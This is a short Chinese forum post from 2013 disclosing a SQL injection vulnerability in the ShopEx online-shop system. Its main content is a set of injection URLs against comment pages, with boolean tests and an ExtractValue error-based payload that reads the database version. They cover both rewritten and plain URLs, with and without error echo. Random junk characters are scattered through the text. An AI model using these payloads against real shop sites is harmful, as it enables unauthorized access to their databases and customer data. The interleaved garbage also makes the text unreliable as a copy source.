注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
8 p+ T# m5 Y, [ }; K6 U8 I
% a$ j* k1 M% L1 w6 Y# W+ C好吧,我扯远了~~+ P. p8 z6 b" t
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~4 X, N2 [. K7 @
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 9 U; S# c1 f! [( V- J" c
/ K( ^4 T9 R9 l
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html " h7 @8 h( a5 C/ @
$ d/ J# F) y1 s9 ]6 M- O Q. `" Shttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
) t& }2 g6 ~+ r) ]
2 r* F1 S, d1 w0 ~! j! R' X: _6 yhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html , A4 `- E; ~& Q9 b( X: B# l Y
( ^. u: s6 v+ O5 {( ~http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html ' d( G6 X. e4 W/ k
/ b7 ^, }% b7 }: H$ s$ {
. M6 p& c! o4 ~* u) f5 M f0 P% \一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
- S& Q% E- _6 O# E) Y如何注入就不多说了,10多年的东西了…不会也会了…
- u- c8 @8 P8 e* ^, p" y! G s+ O/ G
7 E, b ^- N" |: @
2 N) I5 q( L/ j; U; x3 h" D7 I4 o# ]3 `1 z
|
发表于 2013-2-19 08:31:27
收藏
支持
反对